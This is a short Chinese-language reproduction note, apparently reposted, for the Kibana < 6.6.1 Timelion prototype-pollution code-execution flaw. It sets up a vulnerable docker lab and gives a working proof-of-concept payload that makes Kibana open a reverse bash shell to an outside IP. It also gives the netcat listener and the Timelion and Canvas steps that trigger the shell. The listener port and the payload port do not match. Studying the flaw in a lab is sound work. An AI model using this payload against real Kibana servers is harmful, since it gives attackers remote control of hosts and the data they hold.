Kibana < 6.6.1 代码执行漏洞复现笔记
Posted 川云安全团队
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Kibana < 6.6.1 代码执行漏洞复现笔记相关的知识,希望对你有一定的参考价值。
Kibana是一个开源的分析和可视化平台,常被用于和Elasticsearch一起工作。用Kibana来搜索、查看、并和存储在Elasticsearch索引中的数据进行交互。
用户可以在大量数据之上创建条形图,折线图和散点图,或饼图和地图.
Kibana还提供了一个称为Canvas的演示工具,该工具使用户可以创建幻灯片平台,直接从Elasticsearch提取实时数据。
POC:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/10.10.20.166/8989 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
0x01 环境准备:
docker pull kibana:6.5.4
docker pull elasticsearch:6.5.4
docker network create somenetwork
docker run -d --name kibana --net somenetwork -p 5601:5601 kibana:6.5.4
docker run -d --name elasticsearch --net somenetwork -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" elasticsearch:6.5.4
0x02 复现过程:
1. 登陆VPS并监听端口
nc -l 443
2. Timelion
访问Timelion模块,粘贴POC并点击执行按钮
3. Canvas
点击Canvas模块,触发漏洞,成功反弹shell
以上是关于Kibana < 6.6.1 代码执行漏洞复现笔记的主要内容,如果未能解决你的问题,请参考以下文章